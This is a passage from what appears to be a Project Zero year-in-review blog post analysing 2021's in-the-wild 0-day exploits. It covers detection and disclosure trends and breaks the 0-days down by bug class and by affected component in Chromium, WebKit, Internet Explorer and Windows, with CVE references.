https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC72HVhQEdwHNIzMiyb18bUFr6hPCWJiKL2Mm43-tW11qc0ucOPI8A9oChEXQe0-QNOBF83SIcfyjcyvPveuWvgipbiBzHWqZTx2-LilJFYIbx6uQeno9f481HJQ0CgylQkh8Ks7AbGC6tjhYDNBcI7jh6ihhzJATA0r_P4bQUBm-1lmHp2DPvWM6I/s1200/image1%287%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC72HVhQEdwHNIzMiyb18bUFr6hPCWJiKL2Mm43-tW11qc0ucOPI8A9oChEXQe0-QNOBF83SIcfyjcyvPveuWvgipbiBzHWqZTx2-LilJFYIbx6uQeno9f481HJQ0CgylQkh8Ks7AbGC6tjhYDNBcI7jh6ihhzJATA0r_P4bQUBm-1lmHp2DPvWM6I/s1200/image1%287%29.png>)\n\nIs it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.\n\nWhile we often talk about \u201c0-day exploits used in-the-wild\u201d, what we\u2019re actually tracking are \u201c0-day exploits detected and disclosed as used in-the-wild\u201d. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry. \n\nOverall, we can break down the uptick in the number of in-the-wild 0-days into:\n\n * More detection of in-the-wild 0-day exploits\n * More public disclosure of in-the-wild 0-day exploitation\n\n## More detection\n\nIn the [2019 Year in Review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we wrote about the \u201cDetection Deficit\u201d. We stated \u201cAs a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\u201d In the last two years, we believe that there\u2019s been progress on this gap. \n\nAnecdotally, we hear from more people that they\u2019ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we\u2019re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.\n\n[![A bar graph showing the number of distinct reporters of 0-day in-the-wild vulnerabilities per year for 2019-2021. 2019: 9, 2020: 10, 2021: 20. The data is taken from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMbFpoEKSSn5AbAzsovaZ0yN6_OFXo9u4hpDCXJBpro8LRUWJlVQ9CSqtzT2V9ohrhOvP3_RnrYsOzFGPK0FZGJmW2713g2vVW82ReJVXpjAZc57BCxtHg8i-6AdR_ThDZB6UKvzAKekbmAkuUBliMyDyWSBW87z4ZZQJC3KX-_ptZIHveotLGoJ9I/s1200/image5%284%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMbFpoEKSSn5AbAzsovaZ0yN6_OFXo9u4hpDCXJBpro8LRUWJlVQ9CSqtzT2V9ohrhOvP3_RnrYsOzFGPK0FZGJmW2713g2vVW82ReJVXpjAZc57BCxtHg8i-6AdR_ThDZB6UKvzAKekbmAkuUBliMyDyWSBW87z4ZZQJC3KX-_ptZIHveotLGoJ9I/s1200/image5%284%29.png>)\n\n[![a line graph showing how many in-the-wild 0-days were found by their own vendor per year from 2015 to 2021. 2015: 0, 2016: 0, 2017: 2, 2018: 0, 2019: 4, 2020: 5, 2021: 17. Data comes from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRS0t_2Bwvc3U_EIr5h7NcWpQyjzHCPb4OMiDpzPxPs587otAEj8bzwch8UMFlgKchwdSq4L_PXRn1O6KGLHUl4X9voLBdZJNQsgQyJcMCVB4Y8-aRHaXRpOYZw7KVtyNYwdWpwX8ILUV1fyG2kDsXVWORsSPUBGVTON90gWf9POhhxA4edxNe1eoV/s1200/image2%285%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRS0t_2Bwvc3U_EIr5h7NcWpQyjzHCPb4OMiDpzPxPs587otAEj8bzwch8UMFlgKchwdSq4L_PXRn1O6KGLHUl4X9voLBdZJNQsgQyJcMCVB4Y8-aRHaXRpOYZw7KVtyNYwdWpwX8ILUV1fyG2kDsXVWORsSPUBGVTON90gWf9POhhxA4edxNe1eoV/s1200/image2%285%29.png>)\n\nWe\u2019ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it\u2019s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!\n\n## More disclosure\n\nThe second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate \u201cGoogle Android\u201d rather than just \u201cGoogle\u201d because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don\u2019t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by \u201cAnonymous\u201d reporters. If the reporters didn\u2019t want credit for the vulnerability, it\u2019s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn\u2019t have been included in this year\u2019s list if Apple and Google Android had not begun transparently annotating their security advisories. \n\n[![bar graph that shows the number of Android and Apple \$WebKit + iOS + macOS\$ in-the-wild 0-days per year. The bar graph is split into two color: yellow for Anonymously reported 0-days and green for non-anonymous reported 0-days. 2021 is the only year with any anonymously reported 0-days. 2015: 0, 2016: 3, 2018: 2, 2019: 1, 2020: 3, 2021: Non-Anonymous: 8, Anonymous- 12. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPe_J-0Wu9Ap-0n3Yj5BoXiWTnjViyyGasIChhb3juADZosK9nTbyiaWtzuRyjwG3frQNjLsvRMRoQHrFfo1iKa3GjmcuLHqat40GcoechQ16XbhpVGwF7m_TJ0Oucvy3wvm8x0aXbVnJfhkG2FNkxI4cJf5ONBqEYnPxQDUmZChvByLHE8OzSU20N/s1200/image3%287%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPe_J-0Wu9Ap-0n3Yj5BoXiWTnjViyyGasIChhb3juADZosK9nTbyiaWtzuRyjwG3frQNjLsvRMRoQHrFfo1iKa3GjmcuLHqat40GcoechQ16XbhpVGwF7m_TJ0Oucvy3wvm8x0aXbVnJfhkG2FNkxI4cJf5ONBqEYnPxQDUmZChvByLHE8OzSU20N/s1200/image3%287%29.png>)\n\nKudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for [CVE-2021-41773](<https://httpd.apache.org/security/vulnerabilities_24.html>) this past year. \n\nIn-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor\u2019s own security advisories.\n\nIt's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we\u2019re confident that all vendors are transparently disclosing in-the-wild status, there\u2019s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.\n\n# New Year, Old Techniques\n\nWe had a record number of \u201cdata points\u201d in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit \u201cshapes\u201d previously seen in public research. Once \u201c0-day is hard\u201d, we\u2019d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty \u201c[meh](<https://www.dictionary.com/browse/meh#:~:text=unimpressive%3B%20boring%3A>)\u201d or standard.\n\nOut of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it\u2019s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:\n\n * 17 use-after-free\n * 6 out-of-bounds read & write\n * 4 buffer overflow\n * 4 integer overflow\n\nIn the next sections we\u2019ll dive into each major platform that we saw in-the-wild 0-days for this year. We\u2019ll share the trends and explain why what we saw was pretty unexceptional.\n\n## Chromium (Chrome)\n\nChromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.\n\nThe 14 0-day vulnerabilities were in the following components:\n\n * 6 JavaScript Engine - v8 ([CVE-2021-21148](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>), [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>), [CVE-2021-37975](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-37975.html>), [CVE-2021-38003](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>))\n * 2 DOM Engine - Blink ([CVE-2021-21193](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) & [CVE-2021-21206](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>))\n * 1 WebGL ([CVE-2021-30554](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html>))\n * 1 IndexedDB ([CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>))\n * 1 webaudio ([CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>))\n * 1 Portals ([CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>))\n * 1 Android Intents ([CVE-2021-38000](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-38000.html>))\n * 1 Core ([CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>))\n\nWhen we look at the components targeted by these bugs, they\u2019re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.\n\nA couple of the Chromium bugs were even similar to previous in-the-wild 0-days. [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>) is an issue in ScriptProcessorNode::Process() in webaudio where there\u2019s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. [CVE-2019-13720](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-13720.html>) is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.\n\n[CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) is another Chromium in-the-wild 0-day from 2021. It\u2019s a type confusion in the TurboFan JIT in Chromium\u2019s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) in particular deals with code that stores global properties. [CVE-2020-16009](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-16009.html>) was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.\n\n## WebKit (Safari)\n\nPrior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due the sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don\u2019t have historical samples to go off of. Instead, we\u2019ll look at 2021\u2019s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days. \n\nThe 7 in-the-wild 0-days targeted the following components:\n\n * 4 Javascript Engine - JavaScript Core ([CVE-2021-1870](<https://support.apple.com/en-us/HT212146>), [CVE-2021-1871](<https://support.apple.com/en-us/HT212146>), [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>), [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>))\n * 1 IndexedDB ([CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>))\n * 1 Storage ([CVE-2021-30661](<https://support.apple.com/en-us/HT212317>))\n * 1 Plugins ([CVE-2021-1879](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1879.html>))\n\nThe one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021. \n\nIt would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there\u2019s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>), also existed in WebKit and was fixed as [CVE-2021-1844](<https://support.apple.com/en-us/HT212223>), though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, [CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>), was very, very similar to a [bug fixed in Chromium in January 2020](<https://bugs.chromium.org/p/chromium/issues/detail?id=1032890>).\n\n## Internet Explorer\n\nSince we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we\u2019ve ever tracked even though Internet Explorer\u2019s market share of web browser users continues to decrease.\n\n[![Bar graph showing the number of Internet Explorer itw 0-days discovered per year from 2015-2021. 2015: 3, 2016: 4, 2017: 3, 2018: 1, 2019: 3, 2020: 2, 2021: 4. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbMTlnGhVLcVL8K20S3s6hSrpyB6kZAA9CWvWNpn1isbEbLFv0c2rs_dPvM0ALT45NtTvyhp8rGehGDRIAEJ6OZYSkk5mezOEoPJOquVXXyHeqrVOvRGEiQHv_J7Je8Itjc5qhwXMCR-E4y79abuxiddCYoeF2VrVakY-L1q82NeMEPjTA0fFC-t8h/s1200/image4%286%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbMTlnGhVLcVL8K20S3s6hSrpyB6kZAA9CWvWNpn1isbEbLFv0c2rs_dPvM0ALT45NtTvyhp8rGehGDRIAEJ6OZYSkk5mezOEoPJOquVXXyHeqrVOvRGEiQHv_J7Je8Itjc5qhwXMCR-E4y79abuxiddCYoeF2VrVakY-L1q82NeMEPjTA0fFC-t8h/s1200/image4%286%29.png>)\n\nSo why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn\u2019t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we\u2019ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats. \n\nThe four 0-days targeted the following components:\n\n * MSHTML browser engine ([CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>), [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-33742.html>), [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>))\n * Javascript Engine - JScript9 ([CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>))\n\nFor [CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) targets of the campaign initially received a .mht file, which prompted the user to open in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) and [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) were delivered to targets via malicious Office documents.\n\n[CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) and [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) were two common memory corruption bug patterns: a use-after-free due to a user controlled callback in between two actions using an object and the user frees the object during that callback and a buffer overflow.\n\nThere were a few different vulnerabilities used in the exploit chain that used [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.\n\n## Windows\n\nWindows is the platform where we\u2019ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and predicted with the end-of-life of Windows 7 in 2020 and thus why it\u2019s still not especially novel.\n\nIn 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:\n\n * 2 Enhanced crypto provider ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>), [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>))\n * 2 NTOS kernel ([CVE-2021-33771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33771>), [CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>))\n * 2 Win32k ([CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>), [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day